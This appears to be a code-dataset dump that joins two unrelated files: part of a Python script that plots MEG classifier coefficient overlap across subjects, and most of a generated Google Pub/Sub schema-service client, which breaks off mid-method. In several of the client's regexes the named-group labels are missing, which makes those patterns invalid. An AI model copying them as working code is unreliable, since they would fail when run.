'/bigbrain/bigbrain.usr1/homes/nrafidi/MATLAB/groupRepo/shared/megVis/sensormap.mat'\n\n\ndef sort_sensors():\n load_var = sio.loadmat(SENSOR_MAP)\n sensor_reg = load_var['sensor_reg']\n sensor_reg = [str(sens[0][0]) for sens in sensor_reg]\n sorted_inds = np.argsort(sensor_reg)\n sorted_reg = [sensor_reg[ind] for ind in sorted_inds]\n return sorted_inds, sorted_reg\n\n\ndef intersect_coef(exp,\n sen_type,\n word,\n win_time,\n win_len=100,\n overlap=12,\n adj=None,\n num_instances=1,\n avgTime='F',\n avgTest='F'):\n top_dir = run_TGM_LOSO.TOP_DIR.format(exp=exp)\n\n if exp == 'krns2':\n rep = 10\n else:\n rep = None\n 
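# For each subject, load the saved lr-l1 coefficients at this window and keep a mask of features that are nonzero for every class.\n    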
coef_by_sub = []\n for sub in load_data.VALID_SUBS[exp]:\n save_dir = run_TGM_LOSO.SAVE_DIR.format(top_dir=top_dir, sub=sub)\n result_fname = run_TGM_LOSO.SAVE_FILE.format(dir=save_dir,\n sub=sub,\n sen_type=sen_type,\n word=word,\n win_len=win_len,\n ov=overlap,\n perm='F',\n alg='lr-l1',\n adj=adj,\n avgTm=avgTime,\n avgTst=avgTest,\n inst=num_instances,\n rep=rep,\n rsP=1,\n mode='coef') + '.npz'\n if not os.path.isfile(result_fname):\n continue\n result = np.load(result_fname)\n coef = result['coef']\n Cs = result['Cs']\n coef_time = np.array(coef[win_time] != 0)\n C_time = np.array(Cs[win_time])\n print(sub)\n print(C_time)\n print(np.sum(coef_time))\n if sub == 'B' or sub == 'A' or sub == 'K':\n fig, ax = plt.subplots()\n meow = np.squeeze(np.sum(coef_time, axis=0))\n h = ax.imshow(np.reshape(meow, (306, -1)), interpolation='nearest', aspect='auto', vmin=0.0, vmax=coef_time.shape[0])\n ax.set_title('number nonzero coef sum over classes\\n{}'.format(sub))\n fig.colorbar(h, ax=ax)\n coef_time = np.all(coef_time, axis=0)\n\n coef_by_sub.append(coef_time[None, ...])\n intersection = np.mean(np.concatenate(coef_by_sub, axis=0), axis=0)\n return intersection\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--experiment')\n parser.add_argument('--sen_type', choices=run_TGM_LOSO.VALID_SEN_TYPE)\n parser.add_argument('--word', choices = ['noun1', 'verb', 'noun2'])\n parser.add_argument('--win_time', type=int)\n parser.add_argument('--win_len', type=int, default=100)\n parser.add_argument('--overlap', type=int, default=12)\n parser.add_argument('--adj', default='None', choices=['None', 'mean_center', 'zscore'])\n parser.add_argument('--num_instances', type=int, default=2)\n parser.add_argument('--avgTime', default='F')\n parser.add_argument('--avgTest', default='F')\n args = parser.parse_args()\n\n intersection = intersect_coef(args.experiment,\n args.sen_type,\n args.word,\n args.win_time,\n win_len=args.win_len,\n overlap=args.overlap,\n adj=args.adj,\n num_instances=args.num_instances,\n avgTime=args.avgTime,\n avgTest=args.avgTest)\n\n if args.avgTime == 'T':\n reshape_dim = 1\n else:\n reshape_dim = args.win_len\n intersection = np.reshape(intersection, (306, reshape_dim))\n\n sorted_inds, sorted_reg = sort_sensors()\n uni_reg = np.unique(sorted_reg)\n yticks_sens = [sorted_reg.index(reg) for reg in uni_reg]\n\n intersection = intersection[sorted_inds, :]\n\n fig, ax = plt.subplots()\n h = ax.imshow(intersection, interpolation='nearest', aspect='auto', vmin=0.5, vmax=1)\n ax.set_yticks(yticks_sens)\n ax.set_yticklabels(uni_reg)\n ax.set_ylabel('Sensors')\n if reshape_dim > 1:\n time_win = np.array(range(args.win_len))\n time = time_win*2\n ax.set_xticks(time_win[::25])\n ax.set_xticklabels(time[::25])\n ax.set_xlabel('Time (ms)')\n ax.set_title('Fraction of subjects at time window {win_time}\\n{sen_type} {word} {experiment}\\n{win_len}ms {overlap}ms {num_instances} inst'.format(win_time=args.win_time,\n sen_type=args.sen_type,\n word=args.word,\n experiment=args.experiment,\n win_len=args.win_len*2,\n overlap=args.overlap,\n num_instances=args.num_instances))\n plt.colorbar(h)\n fig.tight_layout()\n plt.savefig(\n '/home/nrafidi/thesis_figs/{exp}_coef_intersect_{sen_type}_{word}_{win_time}_win{win_len}_ov{overlap}_ni{num_instances}_avgTime{avgTime}.png'.format(\n exp=args.experiment, sen_type=args.sen_type, word=args.word, avgTime=args.avgTime, win_time=args.win_time, win_len=args.win_len,\n overlap=args.overlap,\n 
num_instances=args.num_instances\n ), bbox_inches='tight')\n plt.show()\n\n\n","repo_name":"nrafidi/thesis-code","sub_path":"python/lr-l1_coef_intersect.py","file_name":"lr-l1_coef_intersect.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"20209044094","text":"from collections import OrderedDict\nfrom distutils import util\nimport os\nimport re\nfrom typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union\nimport pkg_resources\n\nfrom google.api_core import client_options as client_options_lib # type: ignore\nfrom google.api_core import exceptions # type: ignore\nfrom google.api_core import gapic_v1 # type: ignore\nfrom google.api_core import retry as retries # type: ignore\nfrom google.auth import credentials # type: ignore\nfrom google.auth.transport import mtls # type: ignore\nfrom google.auth.transport.grpc import SslCredentials # type: ignore\nfrom google.auth.exceptions import MutualTLSChannelError # type: ignore\nfrom google.oauth2 import service_account # type: ignore\n\nfrom google.iam.v1 import iam_policy_pb2 as iam_policy # type: ignore\nfrom google.iam.v1 import policy_pb2 as policy # type: ignore\nfrom google.pubsub_v1.services.schema_service import pagers\nfrom google.pubsub_v1.types import schema\nfrom google.pubsub_v1.types import schema as gp_schema\n\nfrom .transports.base import SchemaServiceTransport, DEFAULT_CLIENT_INFO\nfrom .transports.grpc import SchemaServiceGrpcTransport\nfrom .transports.grpc_asyncio import SchemaServiceGrpcAsyncIOTransport\n\n\nclass SchemaServiceClientMeta(type):\n \"\"\"Metaclass for the SchemaService client.\n\n This provides class-level methods for building and retrieving\n support objects (e.g. transport) without polluting the client instance\n objects.\n \"\"\"\n\n _transport_registry = OrderedDict() # type: Dict[str, Type[SchemaServiceTransport]]\n _transport_registry[\"grpc\"] = SchemaServiceGrpcTransport\n _transport_registry[\"grpc_asyncio\"] = SchemaServiceGrpcAsyncIOTransport\n\n def get_transport_class(cls, label: str = None,) -> Type[SchemaServiceTransport]:\n \"\"\"Return an appropriate transport class.\n\n Args:\n label: The name of the desired transport. 
If none is\n provided, then the first transport in the registry is used.\n\n Returns:\n The transport class to use.\n \"\"\"\n # If a specific transport is requested, return that one.\n if label:\n return cls._transport_registry[label]\n\n # No transport is requested; return the default (that is, the first one\n # in the dictionary).\n return next(iter(cls._transport_registry.values()))\n\n\nclass SchemaServiceClient(metaclass=SchemaServiceClientMeta):\n \"\"\" Service for doing schema-related operations.\n EXPERIMENTAL: The Schema service is in development and may not\n work yet.\n \"\"\"\n\n @staticmethod\n def _get_default_mtls_endpoint(api_endpoint):\n \"\"\"Convert api endpoint to mTLS endpoint.\n Convert \"*.sandbox.googleapis.com\" and \"*.googleapis.com\" to\n \"*.mtls.sandbox.googleapis.com\" and \"*.mtls.googleapis.com\" respectively.\n Args:\n api_endpoint (Optional[str]): the api endpoint to convert.\n Returns:\n str: converted mTLS api endpoint.\n \"\"\"\n if not api_endpoint:\n return api_endpoint\n\n mtls_endpoint_re = re.compile(\n r\"(?P[^.]+)(?P\\.mtls)?(?P\\.sandbox)?(?P\\.googleapis\\.com)?\"\n )\n\n m = mtls_endpoint_re.match(api_endpoint)\n name, mtls, sandbox, googledomain = m.groups()\n if mtls or not googledomain:\n return api_endpoint\n\n if sandbox:\n return api_endpoint.replace(\n \"sandbox.googleapis.com\", \"mtls.sandbox.googleapis.com\"\n )\n\n return api_endpoint.replace(\".googleapis.com\", \".mtls.googleapis.com\")\n\n DEFAULT_ENDPOINT = \"pubsub.googleapis.com\"\n DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore\n DEFAULT_ENDPOINT\n )\n\n @classmethod\n def from_service_account_file(cls, filename: str, *args, **kwargs):\n \"\"\"Creates an instance of this client using the provided credentials\n file.\n\n Args:\n filename (str): The path to the service account private key json\n file.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n {@api.name}: The constructed client.\n \"\"\"\n credentials = service_account.Credentials.from_service_account_file(filename)\n kwargs[\"credentials\"] = credentials\n return cls(*args, **kwargs)\n\n from_service_account_json = from_service_account_file\n\n @property\n def transport(self) -> SchemaServiceTransport:\n \"\"\"Return the transport used by the client instance.\n\n Returns:\n SchemaServiceTransport: The transport used by the client instance.\n \"\"\"\n return self._transport\n\n @staticmethod\n def schema_path(project: str, schema: str,) -> str:\n \"\"\"Return a fully-qualified schema string.\"\"\"\n return \"projects/{project}/schemas/{schema}\".format(\n project=project, schema=schema,\n )\n\n @staticmethod\n def parse_schema_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a schema path into its component segments.\"\"\"\n m = re.match(r\"^projects/(?P.+?)/schemas/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_billing_account_path(billing_account: str,) -> str:\n \"\"\"Return a fully-qualified billing_account string.\"\"\"\n return \"billingAccounts/{billing_account}\".format(\n billing_account=billing_account,\n )\n\n @staticmethod\n def parse_common_billing_account_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a billing_account path into its component segments.\"\"\"\n m = re.match(r\"^billingAccounts/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_folder_path(folder: str,) -> str:\n \"\"\"Return a fully-qualified folder 
string.\"\"\"\n return \"folders/{folder}\".format(folder=folder,)\n\n @staticmethod\n def parse_common_folder_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a folder path into its component segments.\"\"\"\n m = re.match(r\"^folders/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_organization_path(organization: str,) -> str:\n \"\"\"Return a fully-qualified organization string.\"\"\"\n return \"organizations/{organization}\".format(organization=organization,)\n\n @staticmethod\n def parse_common_organization_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a organization path into its component segments.\"\"\"\n m = re.match(r\"^organizations/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_project_path(project: str,) -> str:\n \"\"\"Return a fully-qualified project string.\"\"\"\n return \"projects/{project}\".format(project=project,)\n\n @staticmethod\n def parse_common_project_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a project path into its component segments.\"\"\"\n m = re.match(r\"^projects/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n @staticmethod\n def common_location_path(project: str, location: str,) -> str:\n \"\"\"Return a fully-qualified location string.\"\"\"\n return \"projects/{project}/locations/{location}\".format(\n project=project, location=location,\n )\n\n @staticmethod\n def parse_common_location_path(path: str) -> Dict[str, str]:\n \"\"\"Parse a location path into its component segments.\"\"\"\n m = re.match(r\"^projects/(?P.+?)/locations/(?P.+?)$\", path)\n return m.groupdict() if m else {}\n\n def __init__(\n self,\n *,\n credentials: Optional[credentials.Credentials] = None,\n transport: Union[str, SchemaServiceTransport, None] = None,\n client_options: Optional[client_options_lib.ClientOptions] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n ) -> None:\n \"\"\"Instantiate the schema service client.\n\n Args:\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n transport (Union[str, ~.SchemaServiceTransport]): The\n transport to use. If set to None, a transport is chosen\n automatically.\n client_options (client_options_lib.ClientOptions): Custom options for the\n client. It won't take effect if a ``transport`` instance is provided.\n (1) The ``api_endpoint`` property can be used to override the\n default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT\n environment variable can also be used to override the endpoint:\n \"always\" (always use the default mTLS endpoint), \"never\" (always\n use the default regular endpoint) and \"auto\" (auto switch to the\n default mTLS endpoint if client certificate is present, this is\n the default value). However, the ``api_endpoint`` property takes\n precedence if provided.\n (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable\n is \"true\", then the ``client_cert_source`` property can be used\n to provide client certificate for mutual TLS transport. If\n not provided, the default SSL client certificate will be used if\n present. 
If GOOGLE_API_USE_CLIENT_CERTIFICATE is \"false\" or not\n set, no client certificate will be used.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n\n Raises:\n google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport\n creation failed for any reason.\n \"\"\"\n if isinstance(client_options, dict):\n client_options = client_options_lib.from_dict(client_options)\n if client_options is None:\n client_options = client_options_lib.ClientOptions()\n\n # Create SSL credentials for mutual TLS if needed.\n use_client_cert = bool(\n util.strtobool(os.getenv(\"GOOGLE_API_USE_CLIENT_CERTIFICATE\", \"false\"))\n )\n\n ssl_credentials = None\n is_mtls = False\n if use_client_cert:\n if client_options.client_cert_source:\n import grpc # type: ignore\n\n cert, key = client_options.client_cert_source()\n ssl_credentials = grpc.ssl_channel_credentials(\n certificate_chain=cert, private_key=key\n )\n is_mtls = True\n else:\n creds = SslCredentials()\n is_mtls = creds.is_mtls\n ssl_credentials = creds.ssl_credentials if is_mtls else None\n\n # Figure out which api endpoint to use.\n if client_options.api_endpoint is not None:\n api_endpoint = client_options.api_endpoint\n else:\n use_mtls_env = os.getenv(\"GOOGLE_API_USE_MTLS_ENDPOINT\", \"auto\")\n if use_mtls_env == \"never\":\n api_endpoint = self.DEFAULT_ENDPOINT\n elif use_mtls_env == \"always\":\n api_endpoint = self.DEFAULT_MTLS_ENDPOINT\n elif use_mtls_env == \"auto\":\n api_endpoint = (\n self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT\n )\n else:\n raise MutualTLSChannelError(\n \"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always\"\n )\n\n # Save or instantiate the transport.\n # Ordinarily, we provide the transport, but allowing a custom transport\n # instance provides an extensibility point for unusual situations.\n if isinstance(transport, SchemaServiceTransport):\n # transport is a SchemaServiceTransport instance.\n if credentials or client_options.credentials_file:\n raise ValueError(\n \"When providing a transport instance, \"\n \"provide its credentials directly.\"\n )\n if client_options.scopes:\n raise ValueError(\n \"When providing a transport instance, \"\n \"provide its scopes directly.\"\n )\n self._transport = transport\n else:\n Transport = type(self).get_transport_class(transport)\n self._transport = Transport(\n credentials=credentials,\n credentials_file=client_options.credentials_file,\n host=api_endpoint,\n scopes=client_options.scopes,\n ssl_channel_credentials=ssl_credentials,\n quota_project_id=client_options.quota_project_id,\n client_info=client_info,\n )\n\n def create_schema(\n self,\n request: gp_schema.CreateSchemaRequest = None,\n *,\n parent: str = None,\n schema: gp_schema.Schema = None,\n schema_id: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> gp_schema.Schema:\n r\"\"\"Creates a schema.\n\n Args:\n request (:class:`~.gp_schema.CreateSchemaRequest`):\n The request object. Request for the CreateSchema method.\n parent (:class:`str`):\n Required. The name of the project in which to create the\n schema. 
Format is ``projects/{project-id}``.\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n schema (:class:`~.gp_schema.Schema`):\n Required. The schema object to create.\n\n This schema's ``name`` parameter is ignored. The schema\n object returned by CreateSchema will have a ``name``\n made using the given ``parent`` and ``schema_id``.\n This corresponds to the ``schema`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n schema_id (:class:`str`):\n The ID to use for the schema, which will become the\n final component of the schema's resource name.\n\n See\n https://cloud.google.com/pubsub/docs/admin#resource_names\n for resource name constraints.\n This corresponds to the ``schema_id`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.gp_schema.Schema:\n A schema resource.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent, schema, schema_id])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a gp_schema.CreateSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, gp_schema.CreateSchemaRequest):\n request = gp_schema.CreateSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if parent is not None:\n request.parent = parent\n if schema is not None:\n request.schema = schema\n if schema_id is not None:\n request.schema_id = schema_id\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.create_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def get_schema(\n self,\n request: schema.GetSchemaRequest = None,\n *,\n name: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> schema.Schema:\n r\"\"\"Gets a schema.\n\n Args:\n request (:class:`~.schema.GetSchemaRequest`):\n The request object. Request for the GetSchema method.\n name (:class:`str`):\n Required. The name of the schema to get. 
Format is\n ``projects/{project}/schemas/{schema}``.\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.schema.Schema:\n A schema resource.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.GetSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.GetSchemaRequest):\n request = schema.GetSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.get_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def list_schemas(\n self,\n request: schema.ListSchemasRequest = None,\n *,\n parent: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> pagers.ListSchemasPager:\n r\"\"\"Lists schemas in a project.\n\n Args:\n request (:class:`~.schema.ListSchemasRequest`):\n The request object. Request for the `ListSchemas`\n method.\n parent (:class:`str`):\n Required. The name of the project in which to list\n schemas. 
Format is ``projects/{project-id}``.\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.pagers.ListSchemasPager:\n Response for the ``ListSchemas`` method.\n\n Iterating over this object will yield results and\n resolve additional pages automatically.\n\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.ListSchemasRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.ListSchemasRequest):\n request = schema.ListSchemasRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if parent is not None:\n request.parent = parent\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.list_schemas]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # This method is paged; wrap the response in a pager, which provides\n # an `__iter__` convenience method.\n response = pagers.ListSchemasPager(\n method=rpc, request=request, response=response, metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n def delete_schema(\n self,\n request: schema.DeleteSchemaRequest = None,\n *,\n name: str = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> None:\n r\"\"\"Deletes a schema.\n\n Args:\n request (:class:`~.schema.DeleteSchemaRequest`):\n The request object. Request for the `DeleteSchema`\n method.\n name (:class:`str`):\n Required. Name of the schema to delete. 
Format is\n ``projects/{project}/schemas/{schema}``.\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.DeleteSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.DeleteSchemaRequest):\n request = schema.DeleteSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.delete_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n rpc(\n request, retry=retry, timeout=timeout, metadata=metadata,\n )\n\n def validate_schema(\n self,\n request: gp_schema.ValidateSchemaRequest = None,\n *,\n parent: str = None,\n schema: gp_schema.Schema = None,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> gp_schema.ValidateSchemaResponse:\n r\"\"\"Validates a schema.\n\n Args:\n request (:class:`~.gp_schema.ValidateSchemaRequest`):\n The request object. Request for the `ValidateSchema`\n method.\n parent (:class:`str`):\n Required. The name of the project in which to validate\n schemas. Format is ``projects/{project-id}``.\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n schema (:class:`~.gp_schema.Schema`):\n Required. 
The schema object to\n validate.\n This corresponds to the ``schema`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.gp_schema.ValidateSchemaResponse:\n Response for the ``ValidateSchema`` method.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Sanity check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent, schema])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n # Minor optimization to avoid making a copy if the user passes\n # in a gp_schema.ValidateSchemaRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, gp_schema.ValidateSchemaRequest):\n request = gp_schema.ValidateSchemaRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n\n if parent is not None:\n request.parent = parent\n if schema is not None:\n request.schema = schema\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.validate_schema]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def validate_message(\n self,\n request: schema.ValidateMessageRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> schema.ValidateMessageResponse:\n r\"\"\"Validates a message against a schema.\n\n Args:\n request (:class:`~.schema.ValidateMessageRequest`):\n The request object. 
Request for the `ValidateMessage`\n method.\n\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n ~.schema.ValidateMessageResponse:\n Response for the ``ValidateMessage`` method.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # Minor optimization to avoid making a copy if the user passes\n # in a schema.ValidateMessageRequest.\n # There's no risk of modifying the input as we've already verified\n # there are no flattened fields.\n if not isinstance(request, schema.ValidateMessageRequest):\n request = schema.ValidateMessageRequest(request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = self._transport._wrapped_methods[self._transport.validate_message]\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def set_iam_policy(\n self,\n request: iam_policy.SetIamPolicyRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> policy.Policy:\n r\"\"\"Sets the IAM access control policy on the specified\n function. Replaces any existing policy.\n Args:\n request (:class:`~.iam_policy.SetIamPolicyRequest`):\n The request object. Request message for `SetIamPolicy`\n method.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n Returns:\n ~.policy.Policy:\n Defines an Identity and Access Management (IAM) policy.\n It is used to specify access control policies for Cloud\n Platform resources.\n A ``Policy`` is a collection of ``bindings``. A\n ``binding`` binds one or more ``members`` to a single\n ``role``. Members can be user accounts, service\n accounts, Google groups, and domains (such as G Suite).\n A ``role`` is a named list of permissions (defined by\n IAM or configured by users). 
A ``binding`` can\n optionally specify a ``condition``, which is a logic\n expression that further constrains the role binding\n based on attributes about the request and/or target\n resource.\n **JSON Example**\n ::\n {\n \"bindings\": [\n {\n \"role\": \"roles/resourcemanager.organizationAdmin\",\n \"members\": [\n \"user:mike@example.com\",\n \"group:admins@example.com\",\n \"domain:google.com\",\n \"serviceAccount:my-project-id@appspot.gserviceaccount.com\"\n ]\n },\n {\n \"role\": \"roles/resourcemanager.organizationViewer\",\n \"members\": [\"user:eve@example.com\"],\n \"condition\": {\n \"title\": \"expirable access\",\n \"description\": \"Does not grant access after Sep 2020\",\n \"expression\": \"request.time <\n timestamp('2020-10-01T00:00:00.000Z')\",\n }\n }\n ]\n }\n **YAML Example**\n ::\n bindings:\n - members:\n - user:mike@example.com\n - group:admins@example.com\n - domain:google.com\n - serviceAccount:my-project-id@appspot.gserviceaccount.com\n role: roles/resourcemanager.organizationAdmin\n - members:\n - user:eve@example.com\n role: roles/resourcemanager.organizationViewer\n condition:\n title: expirable access\n description: Does not grant access after Sep 2020\n expression: request.time < timestamp('2020-10-01T00:00:00.000Z')\n For a description of IAM and its features, see the `IAM\n developer's\n guide `__.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # The request isn't a proto-plus wrapped type,\n # so it must be constructed via keyword expansion.\n if isinstance(request, dict):\n request = iam_policy.SetIamPolicyRequest(**request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method.wrap_method(\n self._transport.set_iam_policy,\n default_timeout=None,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"resource\", request.resource),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def get_iam_policy(\n self,\n request: iam_policy.GetIamPolicyRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = 